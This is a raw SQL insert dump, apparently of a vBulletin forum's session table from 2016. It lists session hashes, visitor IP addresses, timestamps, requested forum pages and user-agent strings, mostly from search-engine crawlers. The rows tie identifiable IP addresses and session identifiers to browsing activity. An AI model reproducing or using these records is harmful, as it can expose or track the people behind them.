('e8e9d1a301b978084166466fb9af0193', 0, '66.249.79.67', '42382f72607791905ff50694f07a1e96', 1474710501, '/index.php', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('1fe0850b92b2e78c369dd297a01545cb', 0, '66.249.79.108', '42382f72607791905ff50694f07a1e96', 1474699468, '/index.php', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('1513826c6889fd93ab0160c8cecc8051', 133, '172.68.58.97', '6e9dca07b2c2f4e35c2c80298e236a58', 1471697313, '/search.php?do=getdaily&days=7', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:40.0) Gecko/20100101 Firefox/40.0', 0, 0, 1, 0, 0, 0, 2, 0, 0),
('5a7258cb8d5acee4491e5605a69b320a', 0, '193.111.188.180', '39c9494e061e439fbe211011f68fd033', 1471716170, '/index.php?', 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Saf', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('9538cf1cc4751f0dce49c5dc48ddeb7c', 0, '217.69.133.237', 'adec92f43af45575d1a28ddcb0eea331', 1471812295, '/index.php', 'Mozilla/5.0 (compatible; Linux x86_64; Mail.RU_Bot/2.0; +http://go.mail.ru/help/robots)', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('708b5b9a38f4d6a7a92bb3311ac7f79a', 0, '217.69.133.234', 'adec92f43af45575d1a28ddcb0eea331', 1471874940, '/showthread.php?goto=newpost&t=2483', 'Mozilla/5.0 (compatible; Linux x86_64; Mail.RU_Bot/2.0; +http://go.mail.ru/help/robots)', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('9c2e45fdca6f64da031da3c5ede5c9e2', 0, '217.69.133.70', 'adec92f43af45575d1a28ddcb0eea331', 1471812306, '/forumdisplay.php?f=39', 'Mozilla/5.0 (compatible; Linux x86_64; Mail.RU_Bot/2.0; +http://go.mail.ru/help/robots)', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('0db4314e2e3079c333ad747ac0ed3b83', 133, '172.68.58.97', '6e9dca07b2c2f4e35c2c80298e236a58', 1471740538, '/search.php?do=getdaily&days=7', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:40.0) Gecko/20100101 Firefox/40.0', 0, 0, 1, 0, 0, 0, 2, 0, 0),
('c26a0acdc6194a3cbbe8aca6c97be946', 0, '217.69.133.240', 'adec92f43af45575d1a28ddcb0eea331', 1471909134, '/showthread.php?goto=newpost&t=2333', 'Mozilla/5.0 (compatible; Linux x86_64; Mail.RU_Bot/2.0; +http://go.mail.ru/help/robots)', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('0be9a13acbe7c9a7526750449c2bebc1', 0, '217.69.133.239', 'adec92f43af45575d1a28ddcb0eea331', 1471903589, '/showthread.php?p=2697', 'Mozilla/5.0 (compatible; Linux x86_64; Mail.RU_Bot/2.0; +http://go.mail.ru/help/robots)', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('4c66cf63c72e214cd5659d93770229fb', 0, '217.69.133.236', 'adec92f43af45575d1a28ddcb0eea331', 1471869240, '/showthread.php?p=3021', 'Mozilla/5.0 (compatible; Linux x86_64; Mail.RU_Bot/2.0; +http://go.mail.ru/help/robots)', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('b1fa66cc939125f236a2e825ee5a8c0c', 0, '2001:41d0:8:e08', 'cdc3063ccb4d4b697d0092a7bea9536b', 1471771831, '/index.php', 'Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('61480a90efc2371956014ca3ec941a4d', 0, '217.69.133.235', 'adec92f43af45575d1a28ddcb0eea331', 1471772212, '/forumdisplay.php?f=32', 'Mozilla/5.0 (compatible; Linux x86_64; Mail.RU_Bot/2.0; +http://go.mail.ru/help/robots)', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('edf07bbe3b40c826919d50bafc99209e', 133, '172.68.58.97', '6e9dca07b2c2f4e35c2c80298e236a58', 1471783527, '/search.php?do=getdaily&days=7', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:40.0) Gecko/20100101 Firefox/40.0', 0, 0, 1, 0, 0, 0, 2, 0, 0),
('63e58202462580b589ad1bfc41b80d42', 0, '217.69.133.238', 'adec92f43af45575d1a28ddcb0eea331', 1471897700, '/showthread.php?p=2988', 'Mozilla/5.0 (compatible; Linux x86_64; Mail.RU_Bot/2.0; +http://go.mail.ru/help/robots)', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('fa57e37bba6610c70dd21f861e262909', 0, '146.0.35.22', '2bdb3c6997554ee5d61e41ab7e054b46', 1471806683, '/register.php', 'Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('77e9a186266c94c091651e1ae315ba8a', 0, '185.17.120.162', 'fb484cea49929537a79d1deed7ef7ec3', 1471808894, '/index.php', 'Mozilla/5.0 (Linux; U; Android 4.1.2; ru-ru; GT-S5282 Build/JZO54K) AppleWebKit/534.30 (KHTML, like', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('3014c6690235903e451a058a75779658', 0, '173.237.243.189', '4bfcf8ee26fad7589c9b3669e47c9b84', 1471809910, '/index.php?', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/601.7.7 (KHTML, like Gecko) Version/9.1.', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('d75dd6348fdef58f47acbb402df12e97', 133, '172.68.58.97', '6e9dca07b2c2f4e35c2c80298e236a58', 1471826226, '/search.php?do=getdaily&days=7', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:40.0) Gecko/20100101 Firefox/40.0', 0, 0, 1, 0, 0, 0, 2, 0, 0),
('da7e5ab2d78a29eb39c435f5c69dcfbf', 133, '172.68.58.97', '6e9dca07b2c2f4e35c2c80298e236a58', 1471869176, '/search.php?do=getdaily&days=7', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:40.0) Gecko/20100101 Firefox/40.0', 0, 0, 1, 0, 0, 0, 2, 0, 0),
('901f572d9e23b8d0309d73348e4789c3', 0, '193.151.240.138', '3578e57d32b8a1fd9f5e1bbc108a3d7f', 1471869959, '/index.php', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('c9081b5e80324a617beb20abd4fdf183', 0, '94.191.186.237', 'b78c1b1db8285f41bf8318076f722b84', 1471883578, '/index.php', 'Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5 Build/MOB30Z; wv) AppleWebKit/537.36 (KHTML, like Gecko)', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('de23dc63edca95eaeb21e2631c58e1de', 0, '119.81.0.44', '8464cc63a9c9286dcdf1dedef830284e', 1471887583, '/register.php?', 'Mozilla/5.0 (iPhone; CPU iPhone OS 9_3_3 like Mac OS X) AppleWebKit/601.1.46 (KHTML, like Gecko) Ver', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('59b8ce2d69a8c2daf8c26c79e5cce031', 133, '172.68.58.97', '6e9dca07b2c2f4e35c2c80298e236a58', 1471914088, '/search.php?do=getdaily&days=7', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:40.0) Gecko/20100101 Firefox/40.0', 0, 0, 1, 0, 0, 0, 2, 0, 0),
('44c701cb1b8ca52d3d0152bdb7430da2', 0, '89.164.144.44', 'c7de0ccf1cb40d5fb0d4ddb8d7d62ff0', 1471914886, '/index.php', 'Mozilla/5.0 (Windows NT 6.1; rv:45.0) Gecko/20100101 Firefox/45.0', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('641a519b564451cc5d720d610313d9ab', 0, '51.255.65.81', '54b1916a6165416b6f9562acbd8c87bd', 1471946054, '/search.php', 'Mozilla/5.0 (compatible; AhrefsBot/5.1; +http://ahrefs.com/robot/)', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('b200686d37c33809d8b6e45698eac444', 133, '172.68.58.97', '6e9dca07b2c2f4e35c2c80298e236a58', 1471957243, '/search.php?do=getdaily&days=7', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:40.0) Gecko/20100101 Firefox/40.0', 0, 0, 1, 0, 0, 0, 2, 0, 0),
('da87ced2f5158ff21c835a2f5ced1d24', 0, '172.68.11.249', '2d567d995829d17913fccdbff80aa662', 1472462474, '/memberlist.php', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.8; rv:47.0) Gecko/20100101 Firefox/47.0', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('020f791179488a18cd36782c11d5ba7e', 0, '172.68.10.245', '86e7e9d929851112a3427d06797c6fc0', 1471969940, '/index.php', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:43.0) Gecko/20100101 Firefox/43.0', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('eab68a5d5cee86eb7f3d33893cd8b747', 0, '192.240.96.70', 'ee7d2c0419ee67f4d114948936c38ae0', 1471972672, '/index.php', 'Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safa', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('520285a254aa7e1ae2543730b57d6a77', 0, '192.240.96.70', '53f821b8d87402afaa2a83bf781bf2d2', 1471973355, '/login.php?do=login&do=login', 'Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 6.1; WebCruiser/3.4)', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('42e35d61e164cd885de37f0a575a46a7', 0, '94.191.188.128', 'a291ac672705b87f7533e068df12ba91', 1471980110, '/index.php', 'Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5 Build/MOB30Z; wv) AppleWebKit/537.36 (KHTML, like Gecko)', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('17a9eb3044f1de674b635abfd48518e0', 0, '172.68.59.179', 'b0345aaa1cdad0c3913eb8918be1ca6a', 1471982265, '/login.php?do=login&do=login', 'Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('0bfef73fbda8f39dbe82c3ae0014471d', 0, '207.46.13.162', '5e207e311e22cdc3b2095126a922fa93', 1471991083, '/forumdisplay.php?f=35', 'Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('505d09507f01691d7b75fc0fdae133e3', 0, '157.55.39.182', '23f3103f44bc3badcba53554e5e4cb6d', 1472082931, '/misc.php?do=showrules', 'Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('bf25a17d67d4e787b0e4049c4ae78aa9', 133, '172.68.58.97', '6e9dca07b2c2f4e35c2c80298e236a58', 1472002271, '/search.php?do=getdaily&days=7', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:40.0) Gecko/20100101 Firefox/40.0', 0, 0, 1, 0, 0, 0, 2, 0, 0),
('bbaf8f198d6b04248c3c367b7317879b', 0, '87.159.28.52', '14bef751a8cf9496bfb2f10d1526b852', 1472005052, '/login.php?do=logout&logouthash=1472005045-b143b456fdf398dfe31df614923c79072e949f80', 'Mozilla/5.0 (Windows NT 10.0; WOW64; rv:47.0) Gecko/20100101 Firefox/47.0', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('b8500db82bd9da4dfc0014fea585daad', 0, '66.249.64.124', '881de0811167d68e6f4733be9b8109c2', 1475126126, '/archive/index.php/t-1856.html', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)', 0, 0, 0, 0, 0, 0, 2, 1, 0),
('4be7f74164093780b36487037a7f0a86', 0, '66.249.64.116', '881de0811167d68e6f4733be9b8109c2', 1475137735, '/index.php?langid=2', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('09281893dccd1bb55fe4ca1cbfb8c884', 0, '66.249.64.72', '881de0811167d68e6f4733be9b8109c2', 1475126127, '/index.php', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('9f4cba3965252ebccd2158238e232593', 0, '66.249.64.67', '881de0811167d68e6f4733be9b8109c2', 1475125516, '/showthread.php?p=1294', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('b6462a760c9da3fd4622ae27e8daee4d', 0, '197.28.68.45', '192c39baa5706a753462dfd56542bb39', 1472031734, '/showthread.php?p=3012', 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:48.0) Gecko/20100101 Firefox/48.0', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('e9bc949813554bd1b40c2fa86ddbf9ff', 133, '172.68.58.97', '6e9dca07b2c2f4e35c2c80298e236a58', 1472045235, '/search.php?do=getdaily&days=7', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:40.0) Gecko/20100101 Firefox/40.0', 0, 0, 1, 0, 0, 0, 2, 0, 0),
('9648c0e4e46ecc18154b62167f52b52c', 0, '66.249.64.112', 'b74d0bcf4e50a120a01910c89bfe2d08', 1472057844, '/index.php', 'Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chr', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('1297708f648fd0e40e978dfcfe000b2e', 0, '5.175.207.96', 'aa395c8fc796b6acdf35fc3077180854', 1472066993, '/index.php', 'Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5 Build/MOB30Z; wv) AppleWebKit/537.36 (KHTML, like Gecko)', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('ebf45ed4ee0007f47ccb23511b7a9cab', 0, '207.46.13.98', '5e207e311e22cdc3b2095126a922fa93', 1472313554, '/search.php', 'Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('eb3c70f16a23f9905355080e6af34313', 0, '157.55.39.251', '23f3103f44bc3badcba53554e5e4cb6d', 1472082912, '/showpost.php?p=1034&postcount=1', 'Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('7f730e841a4e16309cea26bdf9680c98', 0, '157.55.39.49', '23f3103f44bc3badcba53554e5e4cb6d', 1472083010, '/member.php?u=1', 'Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('ae30f107841d065d4b0e0ed1ec220961', 0, '86.145.181.187', 'e4096092a00c902b61657a1eca9933ee', 1472084754, '/index.php', 'Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safar', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('9c746cbf6c3a6777b21366d58b2f8667', 133, '172.68.58.97', '6e9dca07b2c2f4e35c2c80298e236a58', 1472088193, '/search.php?do=getdaily&days=7', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:40.0) Gecko/20100101 Firefox/40.0', 0, 0, 1, 0, 0, 0, 2, 0, 0),
('2f7677c5fbbfb6a6666aa71c31e00663', 0, '172.68.59.122', 'dce73380cf0fd3aff82da93d9252bb04', 1472100410, '/index.php?langid=2', 'Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chr', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('9fb9c34b2a4071ccbda0009d58573164', 178, '52.174.149.172', 'b6a91f2a9f296b9ca9f0a44b63a2a044', 1472107160, '/search.php?do=getdaily', 'Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safa', 0, 0, 2, 0, 0, 0, 2, 0, 0),
('8e56dd09bf2735589bb48245f03d91ac', 0, '172.68.10.201', 'dca1587a5335b09c6cdda2801ab3f50e', 1472109259, '/memberlist.php', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.11', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('f835159c53c006470af9b83ea8a9011a', 0, '95.221.82.156', '6f9d3f7ba573b84afcc3f4f32523975d', 1472120004, '/index.php', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/601.7.7 (KHTML, like Gecko) Version/9.1.', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('fdd93096768a66ed880d092c70d90e0a', 0, '81.214.43.159', '33e2aa1172e8a045037181f541559cda', 1472121630, '/index.php', 'Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('8de723fdbe20a2289cb16061e8a82f56', 0, '80.249.216.98', '19439bc1d676a4599ca3c111dba4143a', 1472126450, '/index.php', 'Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('94cae7d1004a7e3fcaa1bbc05b29edc4', 0, '2a02:598:a::79:', '6af5c53fb446580c61c251da71ef2094', 1472128785, '/index.php', 'Mozilla/5.0 (compatible; SeznamBot/3.2; +http://napoveda.seznam.cz/en/seznambot-intro/)', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('21640c16bab1598151b77a6899d758e1', 133, '172.68.58.97', '6e9dca07b2c2f4e35c2c80298e236a58', 1472133265, '/search.php?do=getdaily&days=7', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:40.0) Gecko/20100101 Firefox/40.0', 0, 0, 1, 0, 0, 0, 2, 0, 0),
('05abedfc4ba7bbf68eaeb19339b6b6a5', 0, '178.252.127.234', 'f0de75067f9fa3d634c536e6cab43a98', 1472134368, '/showthread.php?t=1841', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Maxthon/4.4.1.3000 Chrome', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('c467a4f659ebcc50ddd6b251923abff4', 0, '31.53.132.20', '6bbca927d5df0306d874af25933a80d2', 1472155322, '/index.php', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_3) AppleWebKit/600.5.6 (KHTML, like Gecko) Version/8.0.', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('13d44c76a379c81171e18f2ea3c515b0', 133, '172.68.58.97', '6e9dca07b2c2f4e35c2c80298e236a58', 1472176214, '/search.php?do=getdaily&days=7', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:40.0) Gecko/20100101 Firefox/40.0', 0, 0, 1, 0, 0, 0, 2, 0, 0),
('87f8e6b1a4aa632d3caf743cf9a42edf', 0, '114.125.108.72', 'd5162c39815c9085743b160c0bc552c8', 1472191167, '/index.php', 'Mozilla/5.0 (Windows NT 6.1; rv:48.0) Gecko/20100101 Firefox/48.0', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('e785a29de1453f5b03e3477633e6692a', 0, '107.150.86.77', '4275ad8730ca0ce2610724dc59b27002', 1472214973, '/index.php', 'Mozilla/5.0 (Windows NT 6.2; WOW64; rv:34.0) Gecko/20100101 Firefox/34.0', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('dc5da5b666924ca078b0f86bc3039b1e', 0, '104.160.13.110', '2f1153cc34bbe11ae55fa1e776dbc5e4', 1472215010, '/login.php?do=login&do=login', 'Mozilla/5.0 (Windows NT 6.2; WOW64; rv:34.0) Gecko/20100101 Firefox/34.0', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('5381665b7551c303ffacf95915cb32bc', 133, '172.68.58.97', '6e9dca07b2c2f4e35c2c80298e236a58', 1472219142, '/search.php?do=getdaily&days=7', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:40.0) Gecko/20100101 Firefox/40.0', 0, 0, 1, 0, 0, 0, 2, 0, 0),
('12a16534da1d69db050e28b890da4d9e', 0, '95.211.75.196', '35650bce73e3c003aed759323792fddb', 1472224567, '/showthread.php?t=1092', 'Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safa', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('ec2c3ec011aeb38e3f1b4c93e6280ab7', 0, '207.46.13.8', '5e207e311e22cdc3b2095126a922fa93', 1472791878, '/member.php?u=387', 'Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('bf0629945b4988a6f28f061ce44cbbb2', 0, '207.46.13.167', '5e207e311e22cdc3b2095126a922fa93', 1472260533, '/search.php?do=getdaily', 'Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('93a067c0badb4dba784d214fdcd33019', 0, '172.68.10.201', '8ff362ef6fec08fe533e95ecacdc5e3c', 1472260818, '/index.php', 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Saf', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('9419680e952b378cd93596fe077bbc67', 0, '207.46.13.39', '5e207e311e22cdc3b2095126a922fa93', 1472261674, '/showthread.php?p=2933', 'Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('0e3acb84f64747a770a34fd9d1a7e290', 133, '172.68.58.97', '6e9dca07b2c2f4e35c2c80298e236a58', 1472264088, '/search.php?do=getdaily&days=7', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:40.0) Gecko/20100101 Firefox/40.0', 0, 0, 1, 0, 0, 0, 2, 0, 0),
('b03afbf2fc5709d5771f37a3e706fdda', 0, '201.171.190.138', 'aa84c0cf78824578f04b53e67f013d0c', 1472266734, '/index.php', 'Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('2fed622c1991586b42b7b75e642dcadb', 0, '79.136.39.135', 'd7d6e87f417b38b85e653ada73d974fd', 1472266871, '/register.php', 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.82 Safa', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('6701e978c4a0b51bd2100982c1875aed', 0, '41.254.9.245', '03c0bd4f8d3ec25ba9652af02f3a79ce', 1472292721, '/register.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:47.0) Gecko/20100101 Firefox/47.0', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('6719a31a113e53c6c2200941555c1e78', 0, '66.249.69.67', 'a938925ca9403f145c82d10ebc1ecbe1', 1475086850, '/index.php', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('89fd1bc160f3c19b3a003cd5ed7b7321', 0, '66.249.69.72', 'a938925ca9403f145c82d10ebc1ecbe1', 1475070595, '/index.php', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('49e3eb8af33feba534d6b1873f1ea2b8', 133, '172.68.58.97', '6e9dca07b2c2f4e35c2c80298e236a58', 1472306961, '/search.php?do=getdaily&days=7', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:40.0) Gecko/20100101 Firefox/40.0', 0, 0, 1, 0, 0, 0, 2, 0, 0),
('8586647e90f141e93831785bbee0e21c', 0, '92.73.134.132', '129a24901633f458562ace7a3e7a1c65', 1472309500, '/index.php', 'Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('5e12c0d402a19e8a4ad00836bd7a2639', 0, '172.68.58.115', 'a938925ca9403f145c82d10ebc1ecbe1', 1472349332, '/showthread.php?t=1841', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('f7ed6d6f1f4a75fd30b0b6f430e9d201', 0, '66.249.69.124', 'a938925ca9403f145c82d10ebc1ecbe1', 1474739086, '/search.php?searchthreadid=2506', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('be6ec497f53e8c5fc33d57e6f8b4fd04', 0, '201.171.190.138', '7ec4b0053310be980e233728e54516dd', 1472330589, '/index.php', 'Mozilla/5.0 (iPhone; CPU iPhone OS 9_3_3 like Mac OS X) AppleWebKit/601.1.46 (KHTML, like Gecko) Ver', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('cc7871bd7292a3cdf6cd7202a8a17e9b', 0, '172.68.11.251', '8c815987ff47172ed44dd5e47c552232', 1472332092, '/index.php', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:48.0) Gecko/20100101 Firefox/48.0', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('23eadd6629e6b05c03e622f0cfb93d5f', 0, '46.120.243.129', '39fe6ad9649e4b78b1edb39ef9924499', 1472335033, '/index.php', 'Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Ubuntu Chromium/51.0.2704.79 Ch', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('32abe544b66fb388db118d56e1581013', 0, '98.112.100.50', '11ed6084e4fb12faaf3d5a30891f2169', 1472339161, '/showthread.php?p=2928', 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Saf', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('d65267bc21a96adbde9517f7140e0d01', 0, '172.68.58.122', 'a938925ca9403f145c82d10ebc1ecbe1', 1472340721, '/forumdisplay.php?f=36', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('3621fd2e8496886492fec5bdf24c356c', 0, '172.68.59.92', 'a938925ca9403f145c82d10ebc1ecbe1', 1472342922, '/showthread.php?p=2968', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('da5b123747ab0db09e690e17eac11627', 133, '172.68.58.97', '6e9dca07b2c2f4e35c2c80298e236a58', 1472349698, '/search.php?do=getdaily&days=7', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:40.0) Gecko/20100101 Firefox/40.0', 0, 0, 1, 0, 0, 0, 2, 0, 0),
('393f418cfa835ad871da8f74a2e319d5', 0, '76.170.138.89', '6c19a025807f03137e4319bd16c341ad', 1472354505, '/index.php', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_3) AppleWebKit/600.5.17 (KHTML, like Gecko) Version/8.0', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('91ffa6a6966a2e35f9d2a06bc3680c3d', 0, '172.68.59.84', 'a938925ca9403f145c82d10ebc1ecbe1', 1472358902, '/showthread.php?p=2988', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('f97f301036b97230f46355791ea887a5', 0, '66.249.69.116', 'a938925ca9403f145c82d10ebc1ecbe1', 1475078827, '/index.php', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('3ad1fe1d6c938b5956a0161cf9c974ef', 0, '172.68.59.73', 'a938925ca9403f145c82d10ebc1ecbe1', 1472365402, '/member.php?u=126', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('3a90e4a6309bb2d1b792ce56eab0c5fb', 0, '172.68.58.116', 'a938925ca9403f145c82d10ebc1ecbe1', 1472370422, '/archive/index.php/f-36.html', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)', 0, 0, 0, 0, 0, 0, 2, 1, 0),
('a629c5009e0a54c0ecd9917c30fbf046', 0, '172.68.58.131', 'a938925ca9403f145c82d10ebc1ecbe1', 1472371332, '/faq.php', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)', 0, 0, 0, 0, 0, 0, 2, 0, 0),
